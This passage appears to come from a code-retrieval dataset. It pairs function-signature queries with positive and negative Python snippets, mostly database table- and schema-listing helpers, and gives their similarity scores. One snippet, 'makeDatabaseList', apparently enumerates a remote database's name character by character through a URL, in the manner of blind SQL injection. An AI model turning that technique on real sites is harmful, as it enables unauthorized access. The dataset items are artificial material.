pulumi.get(self, \"table_name\")", "def get_handled_tables(cls) -> list[str]:\n return [\"image_virtual_paths\"]", "def list_all_tables(db):\n # Get the tables which exist in the database\n db_tables = ex_sql_and_fetch(db, \"SELECT * FROM pg_catalog.pg_tables\")\n tables = [t[1] for t in db_tables]\n # Get the master tables from the Config\n config_tables = load_config()[db]['schemas'].keys()\n\n # Check to eliminate tables which don't exist from the Config\n relevant = [t for t in tables for c in config_tables if c in t]\n return relevant", "def create_table_statements() -> [str]:\n pass", "def get_tables(self):\n logging.debug(f\"\"\"get_tables\"\"\")\n conn = self.connect(cxRepo)\n sql = f\"\"\"select table_name,server1_select,server2_select,schema1,\n schema2,tips from {self.schemaRepo}.tablediff\n where step = 0 and result = 'init' order by id\"\"\"\n with conn:\n with conn.cursor() as curs:\n try:\n curs.execute(sql)\n except conn.DatabaseError as exc:\n error, = exc.args\n logging.error(f\"\"\"error executing {sql} : {error}\"\"\")\n rows = curs.fetchall()\n return rows", "def get_tablename(self):\n return self.ds_table", "def get_tables_in_schema(self, conn, schema_name):\n return conn.get_tables(schema_name)['table_name']", "def show_tablespaces(self):\n sql = \"SELECT TABLESPACE_NAME FROM DBA_TABLESPACES WHERE CONTENTS <> 'TEMPORARY' ORDER BY 1\"\n self.cur.execute(sql)\n res = self.cur.fetchall()\n key = ['{#TABLESPACE}']\n lst = []\n for i in res:\n d = dict(zip(key, i))\n lst.append(d)\n print(json.dumps({'data': lst}))", "def list_tables(self):\n request_pb = table_messages_v2_pb2.ListTablesRequest(parent=self.name)\n # We expect a `table_messages_v2_pb2.ListTablesResponse`\n table_list_pb = self._client._table_stub.ListTables(\n request_pb, self._client.timeout_seconds)\n\n result = []\n for table_pb in table_list_pb.tables:\n table_prefix = self.name + '/tables/'\n if not table_pb.name.startswith(table_prefix):\n raise ValueError('Table name %s not of expected format' % (\n table_pb.name,))\n table_id = table_pb.name[len(table_prefix):]\n result.append(self.table(table_id))\n\n return result", "def _extract_table_names_from_sql(query):\n # a good old fashioned regex. turns out this worked better than actually parsing the code\n tables_blocks = re.findall(r'(?:FROM|JOIN)\\s+(\\w+(?:\\s*,\\s*\\w+)*)', query, re.IGNORECASE)\n tables = [tbl\n for block in tables_blocks\n for tbl in re.findall(r'\\w+', block)]\n return list(dict.fromkeys(tables).keys()) # remove duplicates, keeping order", "def __dir__(self) -> list[str]:\n attrs = dir(type(self))\n unqualified_tables = [self._unqualify(x) for x in self.tables]\n return sorted(frozenset(attrs + unqualified_tables))", "def create_all_tables(self):\n pass", "def linked_tables(self, table):\n fk0 = (table.foreign_keys[0].referenced_columns[0]['schema_name'],\n table.foreign_keys[0].referenced_columns[0]['table_name'])\n fk1 = (table.foreign_keys[1].referenced_columns[0]['schema_name'],\n table.foreign_keys[1].referenced_columns[0]['table_name'])\n return [fk0, fk1]", "def table_name(self) -> str:\n return self.model._meta.db_table", "def get_table_list(self, add_attached=False):\n self._check_connection()\n if self.isMSSQL(): # pragma: no cover\n request = \"\"\" SELECT TABLE_NAME FROM (\n SELECT TABLE_NAME, OBJECTPROPERTY(object_id(TABLE_NAME), N'IsUserTable') AS type\n FROM INFORMATION_SCHEMA.TABLES) AS temp_tbl\n WHERE type = 1 ORDER BY TABLE_NAME\"\"\"\n else:\n request = \"\"\" SELECT name\n FROM (SELECT * FROM sqlite_master UNION ALL SELECT * FROM sqlite_temp_master) AS temptbl\n WHERE type in('table','temp') AND name != 'sqlite_sequence' ORDER BY name;\"\"\"\n\n select = self._connection.execute(request)\n res = []\n for el in select:\n res.append(el[0])\n\n if add_attached:\n att = self.get_attached_database_list()\n for at in att:\n if at == \"temp\":\n continue\n sql = \"SELECT name FROM %s.sqlite_master\" % at\n vie = self._connection.execute(sql)\n vie = [\"%s.%s\" % (at, v[0]) for v in vie]\n res.extend(vie)\n return res", "def get_my_tables(self):\n qnum = self.master('sql', att={'type': 'table'}) # it's a Table._call_() function call\n if self.run():\n return (self.table_factory(self.get_table_info(result[0])) for result in self.results[qnum])\n else:\n print('An error has occurred when initializing the database.')", "def query_table_names_and_types(\n self, schema_name: str\n ) -> Iterable[TableNameAndType]:\n\n return [\n TableNameAndType(name=table_name)\n for table_name in self.inspector.get_table_names(schema_name) or []\n ]", "def table_list(self, name=None, strict=True):\n response = self.send(root_url=self.session.dm_url + self.root_url,\n verb=GenericClient.VERB.GET,\n template=TEMPLATES['table_list'],\n uri_params={'name': name, 'strict': strict},\n data=None,\n files=None)\n\n is_5xx(response, \"Unexpected server error : {code}\")\n\n return response.json", "def get(self):\n args = ledger_name_choices.parse_args(req=None, strict=False)\n return DdlServices.list_tables(**args)" ]
[ "0.8072151", "0.8006719", "0.8002535", "0.7987537", "0.78607845", "0.78607196", "0.78587925", "0.78372866", "0.7792003", "0.7758121", "0.7746107", "0.7651905", "0.76492196", "0.76076037", "0.7603518", "0.75557685", "0.7516995", "0.7435231", "0.74144286", "0.7379448", "0.7368278", "0.72656804", "0.723463", "0.71644396", "0.7161553", "0.71569264", "0.7112894", "0.7089295", "0.70296675", "0.7022113", "0.70183444", "0.70173496", "0.6962833", "0.6955991", "0.69515085", "0.6893105", "0.6880555", "0.68752456", "0.6844747", "0.6833746", "0.6817075", "0.6812117", "0.68085647", "0.6787855", "0.6778046", "0.67671853", "0.67337364", "0.67264235", "0.6697339", "0.6694135", "0.66818595", "0.66481775", "0.66091335", "0.6596406", "0.6572924", "0.65683895", "0.6559849", "0.65463436", "0.65156424", "0.646561", "0.64645046", "0.64620286", "0.64389277", "0.64202076", "0.64182454", "0.6415122", "0.6403268", "0.63859314", "0.6380775", "0.63664097", "0.63469005", "0.6334049", "0.63194555", "0.6299579", "0.62980086", "0.6295057", "0.6282662", "0.62539226", "0.62341654", "0.6218945", "0.6218945", "0.6218945", "0.6208454", "0.6197732", "0.618393", "0.61813205", "0.61802727", "0.6167346", "0.61546916", "0.61536574", "0.61307055", "0.61270595", "0.6122126", "0.6106731", "0.6101466", "0.6098372", "0.60708475", "0.6050666", "0.6047697", "0.6030042" ]
0.698688
32
List of database names
def makeDatabaseNamesList(n, ):
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def list_databases():\n config = load_config()\n\n databases = [x for x in config.keys() if \"schemas\" in config[x]]\n return databases", "def get_database_names(self) -> Iterable[str]:\n custom_database_name = self.service_connection.__dict__.get(\"databaseName\")\n\n database_name = self.service_connection.__dict__.get(\n \"database\", custom_database_name or \"default\"\n )\n # By default, set the inspector on the created engine\n self.inspector = inspect(self.engine)\n yield database_name", "def list_databases(self) -> List[Dict]:\n self._check_connection(check_db=False)\n all_data = self.get_databases()\n all_dbs = []\n for data in all_data:\n all_dbs.append(data[\"system:resource_name\"][\"@value\"])\n return all_dbs", "def getDatabases(self):\n query = 'SELECT name FROM sys.databases'\n df = pd.read_sql(query, self.conn)\n return df", "def databases(self) -> pulumi.Output[Optional[Sequence[str]]]:\n return pulumi.get(self, \"databases\")", "def list_databases(self):\n end_point = '/'.join([self.host, 'api', 'databases', ''])\n resp = requests.get(end_point, headers={'Authorization': 'Token {}'.format(self.token)})\n if resp.status_code != 200:\n raise ClientError('Encountered error getting list of databases: {}'.format(resp.json()))\n return resp.json()", "def _get_db_names(self, dbs, strict=True):\n dbs = utils.coerce_to_list(dbs)\n db_names = [utils.get_name(db) for db in dbs]\n if strict:\n good_dbs = self.instance.list_databases()\n good_names = [utils.get_name(good_db) for good_db in good_dbs]\n bad_names = [db_name for db_name in db_names\n if db_name not in good_names]\n if bad_names:\n bad = \", \".join(bad_names)\n raise exc.NoSuchDatabase(\"The following database(s) were not \"\n \"found: %s\" % bad)\n return db_names", "def get_available_databases() -> List[str]:\r\n\tcur = psycopg2.connect(dbname='postgres').cursor()\r\n\tcur.execute(\"SELECT datname FROM pg_database WHERE datistemplate=FALSE;\")\r\n\treturn [row[0][:-6] for row in cur if row[0].endswith('wikidb')]", "def list_databases(self):\n r = self.__get_response(settings.LST_DBS)\n if r[\"status\"] == 200:\n return r[\"result\"]\n raise Exception(r[\"result\"][\"message\"])", "def list_dbs(self):\n return self.get('_all_dbs').json()", "def get_available_databases():\n return map(\n lambda (key, value): (key, value[\"description\"]),\n DumpConverter.DATABASES.items())", "def list_all_databases():\n with _superuser_connection() as conn:\n result = conn.list_all_databases()\n return result", "def databases(self):\n return self._databases", "def do_list(self, line):\n\t\tx = [i for i in self.client.list_databases() if i['name'] not in ['admin','config','line','local','mongoengine_test','pymongo_test']]\n\t\tfor db in x:\n\t\t\tprint(db['name'])", "def databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"databases\")", "def databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"databases\")", "def all_dbs(self):\n return self.cloudant_client.all_dbs()", "def get_databases(self):\n query = mssqlqueries.get_databases()\n logger.info(u'Databases query: %s', query)\n for tabular_result in self.execute_query(query):\n return [x[0] for x in tabular_result[0]]", "def list_databases(self, limit=None, marker=None):\n return self._database_manager.list(limit=limit, marker=marker)", "def get_schemas(self):\n result = self.sql(\"SHOW DATABASES\").execute()\n return [row[0] for row in result.fetch_all()]", "def get_databases(self):\n pass", "def get_databases ():\n return _dbobjects[:]", "def list_databases():\n response = houston.get(\"/history/databases\")\n houston.raise_for_status_with_json(response)\n return response.json()", "def get_databases(self) -> List[Dict]:\n self._check_connection(check_db=False)\n all_dbs = []\n for scope in self._dispatch_json(\"get\", self._api)[\"system:role\"][\n \"system:capability\"\n ][\"system:capability_scope\"]:\n if scope[\"@type\"] == \"system:Database\":\n all_dbs.append(scope)\n return all_dbs", "def databases(self) -> Session:\n uri = f\"{self.uri}/databases\"\n return self.request(uri=uri, method=\"GET\").json()", "def databases(self, instance, **query):\n instance = self._get_resource(_instance.Instance, instance)\n return self._list(_database.Database, instance_id=instance.id, **query)", "def getDatabaseName(self):\n raise NotImplementedError", "def setupDatabases(con, options, dbList):\n currentDatabases = dbGetFirstColumnAsMap(con, \"select datname from pg_database where datistemplate = false\")\n currentRolenames = dbGetFirstColumnAsMap(con, \"select rolname from pg_roles\")\n trace(\"currentDatabases = \" + str(currentDatabases))\n for dbName in dbList:\n trace(\"dbName='%s'\" % str(dbName))\n setupDatabase(con, options, currentDatabases, currentRolenames, dbName, dbList[dbName])", "def show_dbs(*dbs):\n if dbs:\n log.debug(\"get dbs from pillar: %s\", dbs)\n result = {}\n for db in dbs:\n result[db] = __salt__[\"pillar.get\"](\"oracle:dbs:\" + db)\n return result\n else:\n pillar_dbs = __salt__[\"pillar.get\"](\"oracle:dbs\")\n log.debug(\"get all (%s) dbs from pillar\", len(pillar_dbs))\n return pillar_dbs", "def get_db_name(self):\n\t\treturn conf.db_name", "def getTables(self):\n\treturn self.dbNames", "def database_name(self) -> str:\n return pulumi.get(self, \"database_name\")", "def databases(self) -> dict:\n db_info = self.landscape_info[\"databases\"]\n return db_info", "def list_databases(self, instance, limit=None, marker=None):\n return instance.list_databases(limit=limit, marker=marker)", "def databases(self, rel_id=None):\n rel = self.framework.model.get_relation(self.relation_name, rel_id)\n\n relation_data = rel.data[rel.app]\n dbs = relation_data.get(\"databases\")\n return json.loads(dbs) if dbs else []", "def _get_requested_databases(self):\r\n requested_databases = []\r\n if ((self._requested_namespaces is not None) and\r\n (self._requested_namespaces != [])):\r\n for requested_namespace in self._requested_namespaces:\r\n if requested_namespace[0] is '*':\r\n return []\r\n elif requested_namespace[0] not in IGNORE_DBS:\r\n requested_databases.append(requested_namespace[0])\r\n return requested_databases", "def get_attached_database_list(self, file=False):\n if self.isMSSQL():\n return [] # pragma: no cover\n else:\n cur = self._connection.cursor()\n cur.execute(\"PRAGMA database_list;\")\n res = cur.fetchall()\n cur.close()\n res = [r for r in res if r[1] != \"temp\" and r[1] != \"main\"]\n if file:\n return [(r[1], r[2]) for r in res]\n else:\n return [r[1] for r in res]", "def getTableNames(self):\n\tif not self.dbNames:\n\t # get db table names from DB\n\t if self.dbType==\"sqlite\":\n\t query=\"SELECT name FROM sqlite_master WHERE type='table';\"\n\t elif self.dbType==\"mysql\":\n\t query=\"SHOW TABLES\"\n\t self.startTxn(\"SQLUtil.__init__\")\n\t tup=self.fetchAll(query)\n\t self.endTxn(\"SQLUtil.__init__\")\n\t for item in tup:\n\t self.dbNames.append(item[0])\n\treturn self.dbNames", "def getDatabaseName(self):\n return self._base.getDatabaseName()", "def databases(database_container):\n database_container.setupall()\n return database_container", "def database_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"database_name\")", "def _get_database_name(database):\n # make sure the return is only one data type\n filenames = []\n if database is not None:\n if not isinstance(database, list):\n database = [database]\n for db in database:\n filenames += glob.glob(db)\n\n return filenames", "def db_name(self):\n return self._db_name", "def get_dbservers(self):\n ret = []\n for i in self.all_instances:\n if i.is_dbserver():\n ret.append(i)\n return ret", "def database():\n return conf().database", "def __get_available_databases(self, root):\n\t\tfor i in walk_tree(root):\n\t\t\tif '.sqlite3' in i:\n\t\t\t\tyield os.path.abspath(i)", "def get_available_databases():\n\n available_databases = dict()\n all_databases = resource_keys('database', strip=[])\n for database in all_databases:\n try:\n database_entry_point = load_resource(database, 'database')\n\n available_databases[database] = dict()\n\n # Checking if the database has data for the ZT normalization\n available_databases[database][\"has_zt\"] = hasattr(database_entry_point, \"zobjects\") and hasattr(database_entry_point, \"tobjects\")\n available_databases[database][\"groups\"] = []\n # Searching for database groups\n try:\n groups = list(database_entry_point.groups()) or [\"dev\"]\n for g in [\"dev\", \"eval\"]:\n available_databases[database][\"groups\"] += [g] if g in groups else []\n except Exception:\n # In case the method groups is not implemented\n available_databases[database][\"groups\"] = [\"dev\"]\n except Exception:\n pass\n return available_databases", "def parse_databases(default_dbname=\"cal_manager.db\"):\n db_list = []\n calconf = get_calconf()\n if not calconf:\n return db_list\n upload_cookie = calconf.get(\"upload_cookie\")\n # Allow old-format file to be read\n try:\n databases = calconf[\"databases\"]\n except KeyError:\n databases = calconf.get(\"database_dir\")\n if not databases:\n return db_list\n with warnings.catch_warnings():\n warnings.simplefilter(\"always\", DeprecationWarning)\n warnings.warn(\"Use 'databases' instead of 'database_dir' in \"\n \"config file.\",\n DeprecationWarning\n )\n for line in databases.splitlines():\n if not line: # handle blank lines\n continue\n db, *flags = shlex.split(line)\n # \"get\" is default if there are no flags, but if any flags are\n # specified, then \"get\" must be there explicitly\n kwargs = {\"get_cal\": not bool(flags),\n \"store_cal\": False}\n for flag in flags:\n kwarg = f\"{flag}_cal\"\n if kwarg in kwargs:\n kwargs[kwarg] = True\n else:\n raise ValueError(\"{}: Unknown flag {!r}\".format(db, flag))\n\n expanded_db = path.expanduser(db)\n if path.isdir(expanded_db):\n db = path.join(db, default_dbname)\n cls = LocalDB\n elif path.isfile(expanded_db):\n cls = LocalDB\n elif \"/\" in expanded_db and \"//\" not in expanded_db:\n cls = LocalDB\n else: # does not check\n cls = RemoteDB\n kwargs[\"upload_cookie\"] = upload_cookie\n db_list.append((cls, db, kwargs))\n return db_list", "def get_db_name(account=None, species=None, db_type=None, release=None,\n division=None, DEBUG=False):\n if account is None:\n account = get_ensembl_account(release=release)\n \n if DEBUG:\n print \"Connection To:\", account\n print \"Selecting For:\", species, db_type, release\n \n server = DbConnection(account, db_name='PARENT')\n cursor = server.cursor()\n show = \"SHOW DATABASES\"\n if species or db_type or release:\n pattern = make_db_name_pattern(species, db_type, release)\n show = \"%s LIKE %s\" % (show, pattern)\n if DEBUG:\n print show\n cursor.execute(show)\n rows = cursor.fetchall()\n dbs = []\n for row in rows:\n try:\n if division is not None and division not in row[0]:\n continue\n name = EnsemblDbName(row[0])\n if (release is None or name.Release == str(release)) and\\\n (db_type is None or name.Type == db_type):\n dbs.append(name)\n except (IndexError, RuntimeError):\n if DEBUG:\n print \"FAIL:\", row[0]\n continue\n return dbs", "def list(self, instance, limit=None, marker=None):\n return self._list(\"/instances/%s/databases\" % base.getid(instance),\n \"databases\", limit, marker)", "def getDatabaseName( self ):\n return self.mDbname", "def read_db_list(tablename = None):\n\n # Set the default tablename\n if tablename is None:\n tablename = config[\"default-table\"]\n\n conn, tunnel = create_db_conn()\n result = None\n\n try:\n cur = conn.cursor()\n cur.execute(\"USE %s\"%(config['db']))\n cur.execute(\"SELECT * FROM %s;\"%(tablename,))\n conn.commit()\n result = cur.fetchall()\n\n except Exception as e:\n print(\"read_data_list failed\")\n print(e)\n\n conn.close()\n tunnel.close()\n return result", "def dbname(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"dbname\")", "def db_lookup(client):\n dblist_dict= client.get_list_database()\n # print(\"def db_lookup 010:\", dblist_dict)\n # print(\"def db_lookup 020:\", dblist_dict[3]['name'])\n # for element in dblist_dict:\n # print(\"db_lookup 3:\", element['name'])\n return dblist_dict", "def dbinfo(self):\n data = self._http_get(\"dbInfo\")\n return data.json()", "def meta_db_tables(self) -> list:\r\n def _passer(**kwargs):\r\n data = self.engine.execute(\"\"\"\r\n SELECT * FROM sqlite_master WHERE type='table';\r\n \"\"\").fetchall()\r\n table_names = [i[1] for i in data]\r\n return table_names\r\n return self._connectionController(_passer)", "def _db_uri_parts():\n return app.config['SQLALCHEMY_DATABASE_URI'].split('/')", "def database_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"database_name\")", "def summary(self):\n\t\tprint \"Summary--------------------------------------:\"\n\t\tprint \"Available data sources are:\"\n\t\tfor path in self.available_databases:\n\t\t\tprint path", "def index(self, req, instance_id):\n LOG.info(\"Call to Databases index - %s\", instance_id)\n LOG.debug(\"%s - %s\", req.environ, req.body)\n local_id = dbapi.localid_from_uuid(instance_id)\n ctxt = req.environ['nova.context']\n common.instance_available(ctxt, instance_id, local_id, self.compute_api)\n try:\n result = self.guest_api.list_databases(ctxt, local_id)\n except Exception as err:\n LOG.error(err)\n raise exception.InstanceFault(\"Unable to get the list of databases\")\n LOG.debug(\"LIST DATABASES RESULT - %s\", str(result))\n databases = {'databases':[]}\n for database in result:\n mysql_database = models.MySQLDatabase()\n mysql_database.deserialize(database)\n databases['databases'].append({'name': mysql_database.name})\n LOG.debug(\"LIST DATABASES RETURN - %s\", databases)\n return databases", "def num_databases ():\n return len(_dbobjects)", "def list_tables(database):\n config = load_config()\n tables = [x for x in config[database]['schemas']]\n\n return tables", "def database(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"database\")", "def get_database_name(self, data: dict) -> str: # pylint: disable=arguments-differ\n if not data[\"database_name\"] and self.service_connection.database:\n return self.service_connection.database\n return data[\"database_name\"]", "def dbdescs(data, dbname):\n # pylint: disable=bad-continuation\n return {\n 'admin': onedesc(data, dbname, 'admin', 'rw'),\n 'user': onedesc(data, dbname, 'user', 'rw'),\n 'viewer': onedesc(data, dbname, 'viewer', 'ro')\n }", "def get_owned_databases(cursor: Cursor, owner: Owner) -> List[str]:\n try:\n role = pgsql.get_role(cursor, owner_name(owner))\n except KeyError:\n return []\n else:\n return pgsql.get_role_databases(cursor, role)", "def fulldbname(self):\n return 'myfls_'+self.user.username+'_'+self.dbname", "def mysql_database():\n return DATABASE", "def show_tables(db_name):\n output = execute_sql(db_name, \"SELECT name FROM sqlite_master WHERE type='table';\")\n return output", "def mysql_database_name():\n return 'test'", "def remove_dbs():\n conn = pm.MongoClient(host=testhost,\n port=testport)\n print('Removing:')\n [print(x) for x in conn.database_names() if x.startswith(testdbname)]\n [conn.drop_database(x) for x in conn.database_names() if x.startswith(testdbname)]", "def makeDatabaseList():\n charList = []\n for ch in lower:\n # ch = str(ch)\n if(characterInDatabaseName(ch, url)):\n charList.append(ch)\n for ch in numbers:\n ch = str(ch)\n if(characterInDatabaseName(ch, url)):\n charList.append(ch)\n for ch in special:\n ch = str(ch)\n if(characterInDatabaseName(ch, url)):\n charList.append(ch)\n for ch in other:\n ch = str(ch)\n if(characterInDatabaseName(ch, url)):\n charList.append(ch)\n if(caseSensitive):\n for ch in upper:\n # ch = str(ch)\n if(characterInDatabaseName(ch, url)):\n charList.append(ch, url)\n if(wildCards):\n for ch in wildCards:\n # ch = str(ch)\n if(characterInDatabaseName(ch, url)):\n charList.append(ch, url)\n return charList", "def get_inform_from_db(database_file_name: str) -> list:\n global data\n con = sqlite3.connect(database_file_name)\n cur = con.cursor()\n master = 'sqlite_master'\n query = \"SELECT name FROM \" + master + \" WHERE type = 'table'\"\n cur.execute(query)\n data = cur.fetchall()\n return data", "def database_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"database_name\")", "def check_db(self):\n if self.db == 'user':\n db = USERS_LIST\n return db\n elif self.db == 'questions':\n db = QUESTIONS_LIST\n return db\n elif self.db == 'meetups':\n db = MEETUPS_LIST\n return db\n\n elif self.db == 'rsvp':\n db = RSVP_LIST\n return db", "def show_tables(self, name_db):\n conn, cursor = SQLDatabase.connect()\n try:\n cursor.execute(\"SHOW TABLES FROM {}\".format(name_db))\n self.all_tables = [table[0] for table in cursor.fetchall()]\n except mysql.connector.errors.ProgrammingError as err:\n print(\"{} : {} --> unknown\".format(err, name_db))\n finally:\n SQLDatabase.close(cursor, conn)\n\n return self.all_tables", "def get_name(self) -> str:\n return self.dbname", "def get_database_directory(self):\n pass", "def multi_database(database_factories):\n databases = {}\n result = []\n for factory in database_factories:\n name = factory.name or ''\n if name in databases:\n raise ValueError(\"Duplicate database name: %r\" % name)\n db = factory.open()\n db.databases = databases\n db.database_name = name\n databases[name] = db\n # Grrr bug in ZODB. Database doesn't declare that it implements\n # IDatabase.\n if not ZODB.interfaces.IDatabase.providedBy(db):\n zope.interface.directlyProvides(db, ZODB.interfaces.IDatabase)\n zope.component.provideUtility(db, ZODB.interfaces.IDatabase, name)\n db.setActivityMonitor(ZODB.ActivityMonitor.ActivityMonitor())\n result.append(db)\n\n return result, databases", "def database(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"database\")", "def db(self) -> str:\n return self._db", "def valid_datastores(cls):\n\n dblist = os.listdir(DATASTORE_DIR)\n return dblist", "def list_tables(self, **kwargs):\n cursor = self.execute(\n self.list_tables_sql, dict({\"database\": self.uri.database}, **kwargs)\n )\n return [row[0] for row in cursor.fetchall()]", "def _get_database(self, options):\n database_key = options.get('database')\n if not database_key:\n if len(settings.DATABASES) >= 2:\n errmsg = \"Because this project contains more than one database, you\"\n errmsg += \" must specify the --database option.\"\n raise CommandError(errmsg)\n database_key = settings.DATABASES.keys()[0]\n return settings.DATABASES[database_key]", "def stores(self):\n sql = u\"SELECT name FROM `sqlite_master` WHERE type='table'\"\n rows = self.conn.execute(sql)\n return [r['name'] for r in rows\n if r['name'] not in self.invalid_names]", "def databases(self, databases):\n\n self._databases = databases", "def getDatabaseName(self):\n return f\"n{self.name.capitalize()}\"", "def database_name(self):\n try:\n return self._database_name\n except:\n pass\n\n if 'X-UnitTest' in self.request.headers:\n if self.request.headers['X-UnitTest'] == 'True':\n self._database_name = TEST_DATABASE\n return TEST_DATABASE\n default_database = self.application.databases['default']['NAME']\n self._database_name = default_database\n return default_database", "def fetchall(self, databaseName):\n pass", "def get_tables(self, db_name):\n pass", "def full_schema_list(self, schema: str) -> List[str]:\n # Generate the information_schema identifier for that database\n # in order to be able to filter it out\n name_parts = schema.split(\".\")\n\n info_schema = f\"{name_parts[0]}.information_schema\"\n\n fetched_schemas = []\n\n # All Schemas\n if name_parts[1] == \"*\":\n db_schemas = self.show_schemas(name_parts[0])\n for db_schema in db_schemas:\n if db_schema != info_schema:\n fetched_schemas.append(db_schema)\n\n # Prefix schema match\n elif \"*\" in name_parts[1]:\n db_schemas = self.show_schemas(name_parts[0])\n for db_schema in db_schemas:\n schema_name = db_schema.split(\".\", 1)[1].lower()\n if schema_name.startswith(name_parts[1].split(\"*\", 1)[0]):\n fetched_schemas.append(db_schema)\n\n # TODO Handle more complicated matches\n\n else:\n # If no * in name, then return provided schema name\n fetched_schemas = [schema]\n\n return fetched_schemas", "def AddDatabaseList(parser, help_text, required=False):\n if required:\n group = parser.add_group(mutex=False, required=True)\n group.add_argument(\n '--database',\n '-d',\n type=arg_parsers.ArgList(min_length=1),\n metavar='DATABASE',\n help=help_text,\n )\n else:\n parser.add_argument(\n '--database',\n '-d',\n type=arg_parsers.ArgList(min_length=1),\n metavar='DATABASE',\n required=False,\n help=help_text,\n )", "def get_settings_variables(all_tables):\r\n tables_list = [tables.table_name for tables in all_tables]\r\n\r\n database_list = []\r\n for tables in tables_list:\r\n for table in tables:\r\n if \"_db\" in table and \"_db_copy\" not in table:\r\n database_list.append(DatabaseTables(table))\r\n\r\n return database_list", "def listAll(self):\n red = self.dbConnect()\n return red.keys()", "def database(self) -> str:\n\t\treturn os.getenv('APP_DATABASE', 'memory').lower()", "def linked_databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['LinkedDatabaseArgs']]]]:\n return pulumi.get(self, \"linked_databases\")", "def get_all_db_zone(self, context):\n zone_objs = self.dns_manager.get_all_db_zone(context)\n return zone_objs", "def id_chooser(query, ident):\n\n return [\"db1\", \"db2\"]", "def check_name_db ():\n db_checks = [DB_FIRST_MALE, DB_FIRST_FEMALE,\n DB_LAST_SIMPLE, DB_LAST_NAMESON,\n DB_LAST_GAELIC1, DB_LAST_GAELIC2,\n DB_LAST_COMBO1, DB_LAST_COMBO2,\n DB_LAST_UPPER1, DB_LAST_UPPER2]\n\n db_exists = db.database_exists\n for db_name in db_checks:\n if not db_exists(db_name):\n raise DatabaseException, db_name", "def uses_database(self, dbname):\n used = False\n if any([dbname.upper() in y for y in [x.upper() for x in self._dbnames]]):\n used = True\n return used" ]
[ "0.80087274", "0.78206784", "0.77191776", "0.7642941", "0.7639768", "0.7624062", "0.7575778", "0.75723255", "0.7553429", "0.75302035", "0.752453", "0.73743457", "0.7372475", "0.72860897", "0.7283433", "0.7283433", "0.72620213", "0.72427213", "0.72408473", "0.7234212", "0.72252375", "0.7220864", "0.7090598", "0.69247746", "0.6915141", "0.68485975", "0.6818625", "0.67999864", "0.67560005", "0.67220056", "0.6714476", "0.6704931", "0.6681987", "0.6660493", "0.65807754", "0.6569512", "0.656041", "0.65442556", "0.65299577", "0.6447874", "0.6441716", "0.6435395", "0.6417968", "0.63947767", "0.63895106", "0.6366546", "0.6360786", "0.63561803", "0.6351629", "0.6349783", "0.6308776", "0.6272326", "0.62390554", "0.620215", "0.62008715", "0.6175755", "0.6127445", "0.6071253", "0.60654277", "0.60629445", "0.60550505", "0.60541666", "0.6041342", "0.6000453", "0.5951903", "0.5950415", "0.59172505", "0.5898623", "0.58954096", "0.5892437", "0.5890969", "0.5880231", "0.5870215", "0.58657146", "0.58552355", "0.584718", "0.581554", "0.5803168", "0.579759", "0.57637805", "0.5739197", "0.57236344", "0.5697776", "0.5686654", "0.5684148", "0.56814045", "0.5667741", "0.5667477", "0.5665535", "0.5661384", "0.56601596", "0.5652312", "0.56444377", "0.56317455", "0.56260234", "0.5613368", "0.56119895", "0.56022704", "0.5593381", "0.5588735" ]
0.6749918
29
makeList generalized to use the boolean function f.
def makeListF(f, url, *argsf, caseSensitive = False, wildCards = True):
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_bool(bool_list):\n new_list = []\n for lst in bool_list:\n for item in lst:\n new_list.append(item)\n if True in new_list:\n return True\n else:\n return False", "def get_list_of_bool2(self):\n pass", "def build():\n return [5,2,1,3,6] # true\n return [5,2,6,1,3] # false", "def convertToDiscreteFunctionList(boolean: bool) -> cern.japc.value.DiscreteFunctionList:\n ...", "def __convert_boolean_list(boolean_list):\n return ['0' if b else '1' for b in boolean_list]", "def filter_list(f):\n\n def new_function(*args: Union[List[Tuple[str, bool]], Any], **kwargs: Any):\n try:\n return '\\n'.join([file for file, is_saved in\n {k: v for d in f(*args, **kwargs)\n for k, v in d.items()}.items() if not is_saved])\n except AttributeError:\n return ''\n\n return new_function", "def fizz_buzz_using_boolean():\n fizz_buzz_list = []\n\n for x in range(1, 101): \n\n fizz = x % 3 == 0 \n buzz = x % 5 == 0\n \n if fizz and buzz: \n fizz_buzz_list.append('fizzbuzz')\n continue\n elif fizz: \n fizz_buzz_list.append('fizz')\n continue\n elif buzz: \n fizz_buzz_list.append('buzz')\n continue\n else: \n fizz_buzz_list.append(x) \n\n return fizz_buzz_list", "def simple_filter(f, l):\n # a list comprehension with an 'if' clause goes the job nicely\n return [ item for item in l if f(item) ]", "def filter(function, iterable):\n\n if function is bool:\n return [x for x in iterable if x]\n\n return [x for x in iterable if function(x)]", "def to_list(f):\n @functools.wraps(f)\n def wrapper(*args, **kwargs):\n return list(f(*args, **kwargs))\n return wrapper", "def simple_filter_2(f, l):\n # alternative implementation: the same as above, but without comprehension.\n filtered_l = []\n for item in l:\n if f(item):\n filtered_l.append(item)\n return filtered_l\n # I think the list comprehension is not only shorter, but also more\n # readable.", "def make_removal_bool(*bools):\n return(np.invert([np.any(f) for f in zip(*bools)]))", "def make_bool(value):\n def make_value():\n return verify.Term(verify.BOOLEAN, value)\n return make_value", "def boollist(lst):\n return (', '.join(map(lambda x: str(bool(x)), lst))).lower()", "def convertToBooleanArray(booleanArray: typing.List[bool]) -> typing.List[bool]:\n ...", "def my_filter(function,lst):\n return list(x for x in lst if function(x))", "def add_bools(list_of_lists):\n l = []\n def count(recursive):\n l.append(1)\n for child in recursive:\n if isinstance(child, list):\n count(child)\n count(list_of_lists)\n return st.tuples(st.just(list_of_lists), st.tuples(*[st.sampled_from([True, False]) for i in l]))", "def ft_filter(function_to_apply, list_of_inputs):\n if not callable(function_to_apply):\n exit(\"First param should be a Function\")\n try:\n object_iter = iter(list_of_inputs)\n except TypeError:\n exit(\"Second Argument must be iterable\")\n lst = []\n for item in list_of_inputs:\n if function_to_apply(item) == True: \n 